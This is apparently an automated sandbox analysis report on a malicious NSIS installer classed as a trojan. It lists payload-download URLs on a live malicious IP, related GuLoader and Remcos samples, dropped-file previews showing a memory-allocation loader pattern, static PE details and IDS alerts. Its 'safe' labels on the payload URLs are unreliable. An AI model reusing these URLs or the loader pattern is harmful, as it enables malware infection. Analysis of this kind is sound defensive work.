Name	Malicious	Antivirus Detection	Reputation
http://66.63.187.30/AmDxXYvcZBeoV9.bin	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://66.63.187.30/AmDxXYvcZBeoV9.bing	xLDz0WPZYc.exe, 00000003.00000002.3329411686.0000000004F58000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://66.63.187.30/AmDxXYvcZBeoV9.biny	xLDz0WPZYc.exe, 00000003.00000002.3329411686.0000000004F58000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://nsis.sf.net/NSIS_Error	xLDz0WPZYc.exe	false		high
http://nsis.sf.net/NSIS_ErrorError	xLDz0WPZYc.exe	false		high
http://66.63.187.30/AmDxXYvcZBeoV9.binE	xLDz0WPZYc.exe, 00000003.00000002.3329411686.0000000004F58000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://66.63.187.30/AmDxXYvcZBeoV9.bin_	xLDz0WPZYc.exe, 00000003.00000002.3329411686.0000000004F58000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://66.63.187.30/AmDxXYvcZBeoV9.binQ	xLDz0WPZYc.exe, 00000003.00000002.3329411686.0000000004F58000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://66.63.187.30/	xLDz0WPZYc.exe, 00000003.00000002.3329411686.0000000004FA7000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://66.63.187.30/AmDxXYvcZBeoV9.binm32	xLDz0WPZYc.exe, 00000003.00000002.3329411686.0000000004F92000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
66.63.187.30	unknown	United States		8100	ASN-QUADRANET-GLOBALUS	false

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1587852
Start date and time:	2025-01-10 18:42:27 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 24s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name:	Run with higher sleep bypass
Number of analysed new started processes analysed:	8
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	xLDz0WPZYc.exe renamed because original name is a hash value
Original Sample Name:	7cf7ab42508aedf9910b50fafaab9786be8ec80c413387d92f4a1432f66e955b.exe
Detection:	MAL
Classification:	mal68.troj.evad.winEXE@3/12@1/1
EGA Information:	Successful, ratio: 50%
HCA Information:	Successful, ratio: 89% Number of executed functions: 48 Number of non-executed functions: 73
Cookbook Comments:	Found application associated with file extension: .exe Sleeps bigger than 100000000ms are automatically reduced to 1000ms Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 52.149.20.212, 13.95.31.18, 13.107.246.45
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target xLDz0WPZYc.exe, PID 4416 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
66.63.187.30	Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe	Get hash	malicious	Remcos, GuLoader	Browse	66.63.187.30/GrDfwEbxHEuyrsJcDgnTLZ14.bin
	Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe	Get hash	malicious	Remcos, GuLoader	Browse	66.63.187.30/wBWcspgeBmkxYD199.bin
	Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe	Get hash	malicious	Remcos, GuLoader	Browse	66.63.187.30/hpVMAPRZVuaX36.bin

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ASN-QUADRANET-GLOBALUS	vQyKfYxzXB.exe	Get hash	malicious	Remcos	Browse	69.174.98.48
	https://zfrmz.com/3GiGYUP4BArW2NBgkPU3	Get hash	malicious	Unknown	Browse	45.61.152.125
	gem1.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	66.63.187.173
	armv5l.elf	Get hash	malicious	Unknown	Browse	104.237.80.14
	30% Order payment-BLQuote_'PO#385995790.exe	Get hash	malicious	AsyncRAT	Browse	69.174.100.131
	drop1.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	66.63.187.173
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, XWorm, Xmrig	Browse	66.63.187.122
	drop1.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	66.63.187.173
	drop1.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	66.63.187.173

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\nsh73EF.tmp\System.dll	Ppto.24265.exe	Get hash	malicious	FormBook, GuLoader	Browse
	Ppto.24265.exe	Get hash	malicious	FormBook, GuLoader	Browse
	Ricowell Ind New INQ.bat.exe	Get hash	malicious	FormBook, GuLoader	Browse
	Ricowell Ind New INQ.bat.exe	Get hash	malicious	GuLoader	Browse
	Setup_x86.exe	Get hash	malicious	Unknown	Browse
	ORDER.exe	Get hash	malicious	FormBook, GuLoader	Browse
	ORDER.exe	Get hash	malicious	Unknown	Browse
	ulACwpUCSU.exe	Get hash	malicious	FormBook, GuLoader	Browse
	fJuwM4Bwi7.exe	Get hash	malicious	FormBook, GuLoader	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Temp\Settings.ini

Download File

Process:	C:\Users\user\Desktop\xLDz0WPZYc.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	52
Entropy (8bit):	4.725996747697686
Encrypted:	false
SSDEEP:	3:HM/xiXWR0AXQQLQIfLBJXmgxv:HHpQkIP2I
MD5:	87C38DC6EF4616FF016D1CCC1A793086
SHA1:	AFC6434AAAD4FB1A250AF0D167DAB718DA10B4AF
SHA-256:	781C527A7A89FDBFA481BF8800E255DC1B69E47B2B68040DC39103C114E31849
SHA-512:	CC8EF7D9C98FB663C79A4A00FD68344F7AA3DBA27D68B3AEF463C758A74AEBF8190C8A9532FE91BC7DB32E78FF2C48C43230F03DA226F9A9EF288324EFEBF0FE
Malicious:	false
Reputation:	low
Preview:	[Initialize]..First=user32::EnumWindows(i r1 ,i 0)..

C:\Users\user\AppData\Local\Temp\nsc746D.tmp

Download File

Process:	C:\Users\user\Desktop\xLDz0WPZYc.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	52
Entropy (8bit):	4.0914493934217315
Encrypted:	false
SSDEEP:	3:sBa99k1NoCFOn:KankVg
MD5:	5D04A35D3950677049C7A0CF17E37125
SHA1:	CAFDD49A953864F83D387774B39B2657A253470F
SHA-256:	A9493973DD293917F3EBB932AB255F8CAC40121707548DE100D5969956BB1266
SHA-512:	C7B1AFD95299C0712BDBC67F9D2714926D6EC9F71909AF615AFFC400D8D2216AB76F6AC35057088836435DE36E919507E1B25BE87B07C911083F964EB67E003B
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	kernel32::SetFilePointer(i r5, i 1200 , i 0,i 0)i.r3

C:\Users\user\AppData\Local\Temp\nsh73EF.tmp\System.dll

Download File

Process:	C:\Users\user\Desktop\xLDz0WPZYc.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	11264
Entropy (8bit):	5.779474184733856
Encrypted:	false
SSDEEP:	96:zPDYcJ+nx4vVp76JX7zBlkCg21Fxz4THxtrqw1at0JgwLEjo+OB3yUVCdl/wNj+y:zPtkuWJX7zB3kGwfy0nyUVsxCjOM61u
MD5:	6F5257C0B8C0EF4D440F4F4FCE85FB1B
SHA1:	B6AC111DFB0D1FC75AD09C56BDE7830232395785
SHA-256:	B7CCB923387CC346731471B20FC3DF1EAD13EC8C2E3147353C71BB0BD59BC8B1
SHA-512:	A3CC27F1EFB52FB8ECDA54A7C36ADA39CEFEABB7B16F2112303EA463B0E1A4D745198D413EEBB3551E012C84A20DCDF4359E511E51BC3F1A60B13F1E3BAD1AA8
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: Ppto.24265.exe, Detection: malicious, Browse Filename: Ppto.24265.exe, Detection: malicious, Browse Filename: Ricowell Ind New INQ.bat.exe, Detection: malicious, Browse Filename: Ricowell Ind New INQ.bat.exe, Detection: malicious, Browse Filename: Setup_x86.exe, Detection: malicious, Browse Filename: ORDER.exe, Detection: malicious, Browse Filename: ORDER.exe, Detection: malicious, Browse Filename: ulACwpUCSU.exe, Detection: malicious, Browse Filename: fJuwM4Bwi7.exe, Detection: malicious, Browse
Reputation:	moderate, very likely benign file
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......)...m.m.m...k.m.~....j.9..i....l....l.Richm.........................PE..L....\.U...........!.................'.......0...............................`.......................................2.......0..P............................P.......................................................0..X............................text..._........................... ..`.rdata..S....0......."..............@..@.data...h....@.......&..............@....reloc..b....P.......(..............@..B................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\nsh7577.tmp

Download File

Process:	C:\Users\user\Desktop\xLDz0WPZYc.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.51038309657817
Encrypted:	false
SSDEEP:	3:sEMBQEJkJVEjM2Q6XxQoXUn:tKXxvUn
MD5:	8E2223169ADE668CE3920B01C8AA100E
SHA1:	EFB2C58919EB2592233E57E3423FF075EE9326C0
SHA-256:	7D41D2BCC88F004B6D83D76AF072075D082040D7DEF97FEED09A4FC6C33A3176
SHA-512:	131AC3450AC6351CB7281E1E46ADA18B003CDC6FA5C2B4C8F2279AE3E9A3A80573B645D18F44E6E6C5B7AFD59B0873D098F4E148E595E512DEFA1F37F3B7791D
Malicious:	false
Reputation:	low
Preview:	kernel32::VirtualAlloc(i 0,i 57454592, i 0x3000, i 0x40)p.r1

C:\Users\user\AppData\Local\Temp\nsl7286.tmp

Download File

Process:	C:\Users\user\Desktop\xLDz0WPZYc.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	74
Entropy (8bit):	3.9637832956585757
Encrypted:	false
SSDEEP:	3:sRQE1wFEt/ijNJyI3dj2+n:aQEGiwh3D
MD5:	16D513397F3C1F8334E8F3E4FC49828F
SHA1:	4EE15AFCA81CA6A13AF4E38240099B730D6931F0
SHA-256:	D3C781A1855C8A70F5ACA88D9E2C92AFFFA80541334731F62CAA9494AA8A0C36
SHA-512:	4A350B790FDD2FE957E9AB48D5969B217AB19FC7F93F3774F1121A5F140FF9A9EAAA8FA30E06A9EF40AD776E698C2E65A05323C3ADF84271DA1716E75F5183C3
Malicious:	false
Preview:	kernel32::CreateFileA(m r4 , i 0x80000000, i 0, p 0, i 4, i 0x80, i 0)i.r5

C:\Users\user\AppData\Local\Temp\nso7A7A.tmp

Download File

Process:	C:\Users\user\Desktop\xLDz0WPZYc.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	30
Entropy (8bit):	4.256564762130954
Encrypted:	false
SSDEEP:	3:DyWgLQIfLBJXmgU:mkIP25
MD5:	F15BFDEBB2DF02D02C8491BDE1B4E9BD
SHA1:	93BD46F57C3316C27CAD2605DDF81D6C0BDE9301
SHA-256:	C87F2FF45BB530577FB8856DF1760EDAF1060AE4EE2934B17FDD21B7D116F043
SHA-512:	1757ED4AE4D47D0C839511C18BE5D75796224D4A3049E2D8853650ACE2C5057C42040DE6450BF90DD4969862E9EBB420CD8A34F8DD9C970779ED2E5459E8F2F1
Malicious:	false
Preview:	user32::EnumWindows(i r1 ,i 0)

C:\Users\user\AppData\Local\Temp\nst7960.tmp

Download File

Process:	C:\Users\user\Desktop\xLDz0WPZYc.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	56
Entropy (8bit):	4.24214984251469
Encrypted:	false
SSDEEP:	3:sAAEVvjs8QwMj84n:fLby
MD5:	65F323B491B59FFB602FA78A7FB6859D
SHA1:	8385C4863F3EBBE6A0CA5C639B1B02F0303CC036
SHA-256:	BB8F96C8651F7EC6E50C0B761EADD59B821999C3D465E2F068A1B5EA605337A2
SHA-512:	589770CD1188D2A3AC67FEB447EDB758F9BAA0D34347FA7ED6222EF6A368CCF016513EBF4F08EEFD9BABE903340347C9C5F3CDDC15ACF1152E1701F13773E810
Malicious:	false
Preview:	kernel32::ReadFile(i r5, i r1, i 57454592,*i 0, i 0)i.r3

C:\Users\user\AppData\Roaming\Studerekammermenneskes\Carida.Cau

Download File

Process:	C:\Users\user\Desktop\xLDz0WPZYc.exe
File Type:	data
Category:	dropped
Size (bytes):	443463
Entropy (8bit):	7.1060208528446225
Encrypted:	false
SSDEEP:	6144:6eFLl9ao3Quyw5WWAMSYo6iddXZCQOSKPJMUTr4eTiJpe1rGYySat8HqTVhigC:lFLCgyw5PAMSndVgMUPKUStSG0L
MD5:	BED600EBCF25FB176F3C33C49032C708
SHA1:	CCAB1DF83370C5C8C2CFC4C1DC56BEBA0BFD209D
SHA-256:	BD8BBA41CD2FB016F23D8EFF0AA46B940CF682A3F53E487671C883342DF0F815
SHA-512:	E38A129C8E0C28EB5D703B9A5B371D6D97BBE1E5C73EE5B865EA7790E1016FA9B2F846D624CA569456D318E1B94C97EFAF4588FF397B7AB632DDEC14E29D9315
Malicious:	false
Preview:	.........----........... .........YY.........@..............{{...ii.......t...eeeee.p......1..n.z..........-................55.33........uuuu....SS.a.................OOO.......a..........V..AAA..f...........................c...............qqq...............O...}}.H....l.jjj.>.D..""..[......................:.......55..((.KK................U...........................L....p..W..................................s......................l.[[[......V...__.................;;..........__.....T...D...................k....>>>........................)............--............:....cc.....hhhh....8....!!.............&&&&&&....nnn.\|...........'.p......................FFF.U..................)................jjj.......r.............$$$$.................?.................................YY...u.....E..................n.J........--.#......E...--..????..........>>>>>>>..22.......:...h.S...........,.................XXX...................YY.....R....................................Z...`.......... ....o.....

C:\Users\user\AppData\Roaming\Studerekammermenneskes\Lothar.unl

Download File

Process:	C:\Users\user\Desktop\xLDz0WPZYc.exe
File Type:	data
Category:	dropped
Size (bytes):	405493
Entropy (8bit):	1.246302898520162
Encrypted:	false
SSDEEP:	1536:SMSKb0U1bKXTxlJBDh8fwx/hCIFWwF/hAGVFLK:tb0U4XTxBUwdFWwZQ
MD5:	2D4BB09FC720DBF5FF883C376957C192
SHA1:	E8633B582A2DE84480838E18A393CB69A0DEA7A5
SHA-256:	A1DAE3293AFAA57868FA347417F8B4E9B504778267F523510E66A701FDDBD796
SHA-512:	05F0CA6FDC7546393990D50217D7DD3E29CC41DC19B702678E67BD5EF6AA9C8B4BF67A7D72DA3CD0EEE3C4B968E1F835FA88AFF56018AA4FA29E06D79FD94DD7
Malicious:	false
Preview:	...`................U..............^.............}........../.~......................\|...............................E.......n...E..Q......#............."..............3.....]........................................................................................................................k.{......................................................j.....>..................G......Q....................................... ......................................................................39.............q.........L.....................................7...........................i...............................W.........g..............................................................+................................................................}....................y...............................................m............................................D......................................................................................................................F.....y..

C:\Users\user\AppData\Roaming\Studerekammermenneskes\Turnoffs.Wei107

Download File

Process:	C:\Users\user\Desktop\xLDz0WPZYc.exe
File Type:	GLS_BINARY_MSB_FIRST
Category:	dropped
Size (bytes):	93375
Entropy (8bit):	4.580946458707374
Encrypted:	false
SSDEEP:	1536:Alp+RhDsJsRkvT5g3QrwktSfauVAgTc746z0z/Nrr5:Az+RVRPctUXVAgBTFh
MD5:	4F5E2D0BABBCEB3EBFF820D6B2C277EB
SHA1:	ED0ECF48CD9233F66644F9419427A82EB5A10D7D
SHA-256:	AFAF78A5B733E2A0AD3CC8A5EDEBD9397E91961DE1B61E4ACB987B2B40DE4E50
SHA-512:	AFC53D79243A7EC1581D42372922A7D03D17FAE79144AA693F6390C92435E090DD2E8AD7D201CFE3E481BF6101465F7AD6ECAB589F5579D1F874AD1961E86BDB
Malicious:	false
Preview:	......... ....&&&&.............**........66666........................t.AA.............(....................T.{{..........q..................66................................xx..C......J....??.................................................QQQ.[.......................}}}}.......a.....>...............,,..........T.-....V...........H......3..I...........__..zzzzzz.....W.vv.............................t....!!!!!...'''........H.....................(....W................YYY..........J.................................C.1............n...............................!................ggg.....55........33......rr.?..........................q................. .???..................e......2222..........F.........llll.........i.......................B..........88....................xx.P.r......d....hh.ccc.........?.BB..........GG...$$$..5555............................................................FF......YYY.................OO..q...............T.............e...................................

C:\Users\user\AppData\Roaming\Studerekammermenneskes\immaterials.met

Download File

Process:	C:\Users\user\Desktop\xLDz0WPZYc.exe
File Type:	data
Category:	dropped
Size (bytes):	268320
Entropy (8bit):	1.2484153809015175
Encrypted:	false
SSDEEP:	768:XRm/UHiPv8+9Qi8nCX5O1RRZnytZfr65hMN59EgukI/8d2VlycdnTd8snimGRk6W:hsnyUIDiM1idzUbj3
MD5:	E08BB74F72E7A74CA9E1066D0732C60C
SHA1:	C6A0748FC271905D76A83EE61D2512CCE97C9577
SHA-256:	8592211ACEAC0B42741D538187B25156E5667D511B754478FF0BE61F664C7867
SHA-512:	96A2312E03C64B98CCDECB8F557645828880551BF28E9196EC37C4536259876F4BB1EC11E485118B4F6206F2B5897006010DDF4C85E011BDA83DFBDD5BA0FB1A
Malicious:	false
Preview:	.........................................>........Y.........................................^.....O....{.............../.........I................4......b.................Z..............,.......L..F......................l.................................E......................................p......&...............2.......................P.......................................................................6...........y(......................................................................K....................................a......................................_....b...~..................N...I..............................L.........B..................................................6..c.r................`b................................_.......................#........................,.........................3...K^..........................................................................H..V.............K..........................................8..............................

C:\Users\user\AppData\Roaming\Studerekammermenneskes\pivalic.kon

Download File

Process:	C:\Users\user\Desktop\xLDz0WPZYc.exe
File Type:	data
Category:	dropped
Size (bytes):	299353
Entropy (8bit):	1.2515527061732419
Encrypted:	false
SSDEEP:	768:IrwdaO+ErGCGiQiWrxVTG+gEquPOuNVN3LDYpiizG4daXq7KvsUj7wK9/JpZY6nU:U8Q1TwxsYS6LTinpUVvDuGT/F
MD5:	75862CAC4E48811142F0D6BC4C760FD5
SHA1:	4A862856AC5613B8865FFB5CA3D4BCD377D857A5
SHA-256:	1370C0CF01285FECFB686F3A8377CF456C5175C1970225CBD83AB9687BD93F7A
SHA-512:	FE8BDD8B3196826D4C4202689CAE3A2A95B96F4758C1DF532E03894393DEC5D6EA110EB70B7269F14C81EA3E9DEC373BE6BEB06891F73199586C42ABC4273CB5
Malicious:	false
Preview:	......................................................................1.B............................1...............................................................................5..................................................................................................................................................I..........................W............................................y..............................................._...........................F..............8........................................4...................................M...........G...............................................1................Z.........j.....................N...................................... ..............................]........./..........................................................ew.......................................6..........................".......2.....................................M...q................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	7.980593050511499
TrID:	Win32 Executable (generic) a (10002005/4) 92.16% NSIS - Nullsoft Scriptable Install System (846627/2) 7.80% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	xLDz0WPZYc.exe
File size:	576'325 bytes
MD5:	74e2251dfa1e7fbeb0e4e9ba2f6c56b4
SHA1:	468d0612612e0424ea38eb7426d893a5098d245b
SHA256:	7cf7ab42508aedf9910b50fafaab9786be8ec80c413387d92f4a1432f66e955b
SHA512:	831efb203b54b2e1dd40466883d4bf782764f14bc7b3ae832960297d97a63265844bf7a8114ef25937db0501c4cff1acdd432b59bbf8965b6bca712a00150187
SSDEEP:	12288:lCiOsdE13z3jIhfSqc47HPUiJCsBNEeS+qZCmmf8sVyb9yssb:bOWEp30x/7rJueS+aCmmf8sVy6
TLSH:	1DC423D69AD6D8A3F0E205BE0E779B75C67EE608502C44479BC7ED93BC390827A0E4D1
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1p.:u..iu..iu..i...iw..iu..i...i...id..i!2.i...i...it..iRichu..i........PE..L....\.U.................\...........0.......p....@

File Icon


Icon Hash:	3d2e0f95332b3399

Static PE Info

General

Entrypoint:	0x4030b6
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x55C15CDD [Wed Aug 5 00:46:21 2015 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	e160ef8e55bb9d162da4e266afd9eef3

Entrypoint Preview

Instruction
sub esp, 00000184h
push ebx
push ebp
push esi
xor ebx, ebx
push edi
mov dword ptr [esp+18h], ebx
mov dword ptr [esp+10h], 00409190h
mov dword ptr [esp+20h], ebx
mov byte ptr [esp+14h], 00000020h
call dword ptr [00407034h]
push 00008001h
call dword ptr [0040711Ch]
push ebx
call dword ptr [0040728Ch]
push 00000009h
mov dword ptr [00423798h], eax
call 00007F270460FE52h
mov dword ptr [004236E4h], eax
push ebx
lea eax, dword ptr [esp+38h]
push 00000160h
push eax
push ebx
push 0041EC98h
call dword ptr [00407164h]
push 00409180h
push 00422EE0h
call 00007F270460FAFCh
call dword ptr [00407120h]
mov ebp, 00429000h
push eax
push ebp
call 00007F270460FAEAh
push ebx
call dword ptr [00407118h]
cmp byte ptr [00429000h], 00000022h
mov dword ptr [004236E0h], eax
mov eax, ebp
jne 00007F270460D06Ch
mov byte ptr [esp+14h], 00000022h
mov eax, 00429001h
push dword ptr [esp+14h]
push eax
call 00007F270460F57Ah
push eax
call dword ptr [00407220h]
mov dword ptr [esp+1Ch], eax
jmp 00007F270460D125h
cmp cl, 00000020h
jne 00007F270460D068h
inc eax
cmp byte ptr [eax], 00000020h
je 00007F270460D05Ch

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x73a4	0xb4	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x34000	0xbc8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x7000	0x298	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x5ac0	0x5c00	b2645f74b36b1cbbff66d6cf2b9a61fb	False	0.6638077445652174	data	6.434017891994297	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x7000	0x11ce	0x1200	640f709ec19b4ed0455a4c64e5934d5e	False	0.4520399305555556	OpenPGP Secret Key	5.23558258677739	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x9000	0x1a7d8	0x400	135ffaf7e3978322a97c335bc761bdb6	False	0.609375	data	4.961292527260562	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x24000	0x10000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x34000	0xbc8	0xc00	2eed50edc1bb3fcae915bfbf8800f6e6	False	0.4345703125	data	4.452305564094297	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x341c0	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 640	English	United States	0.42473118279569894
RT_DIALOG	0x344a8	0x144	data	English	United States	0.5216049382716049
RT_DIALOG	0x345f0	0x100	data	English	United States	0.5234375
RT_DIALOG	0x346f0	0x11c	data	English	United States	0.6056338028169014
RT_DIALOG	0x34810	0x60	data	English	United States	0.7291666666666666
RT_GROUP_ICON	0x34870	0x14	data	English	United States	1.2
RT_MANIFEST	0x34888	0x33f	XML 1.0 document, ASCII text, with very long lines (831), with no line terminators	English	United States	0.5547533092659447

Imports

DLL	Import
KERNEL32.dll	GetTickCount, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, SearchPathA, GetShortPathNameA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, SetEnvironmentVariableA, GetWindowsDirectoryA, GetTempPathA, Sleep, CloseHandle, LoadLibraryA, lstrlenA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, ReadFile, lstrcpyA, lstrcatA, GetSystemDirectoryA, GetVersion, GetProcAddress, GlobalAlloc, CompareFileTime, SetFileTime, ExpandEnvironmentStringsA, lstrcmpiA, lstrcmpA, WaitForSingleObject, GlobalFree, GetExitCodeProcess, GetModuleHandleA, SetErrorMode, GetCommandLineA, LoadLibraryExA, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, WriteFile, FindClose, WritePrivateProfileStringA, MultiByteToWideChar, MulDiv, GetPrivateProfileStringA, FreeLibrary
USER32.dll	CreateWindowExA, EndDialog, ScreenToClient, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, GetDC, SystemParametersInfoA, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, ReleaseDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, DestroyWindow, CreateDialogParamA, SetTimer, GetDlgItem, wsprintfA, SetForegroundWindow, ShowWindow, IsWindow, LoadImageA, SetWindowLongA, SetClipboardData, EmptyClipboard, OpenClipboard, EndPaint, PostQuitMessage, FindWindowExA, SendMessageTimeoutA, SetWindowTextA
GDI32.dll	SelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll	SHGetSpecialFolderLocation, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA
ADVAPI32.dll	RegCloseKey, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegEnumValueA, RegCreateKeyExA, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
COMCTL32.dll	ImageList_Create, ImageList_AddMasked, ImageList_Destroy
ole32.dll	CoCreateInstance, CoTaskMemFree, OleInitialize, OleUninitialize
VERSION.dll	GetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-10T18:43:23.540346+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.8	62772	66.63.187.30	80	TCP
2025-01-10T18:44:38.985836+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.8	62501	66.63.187.30	80	TCP
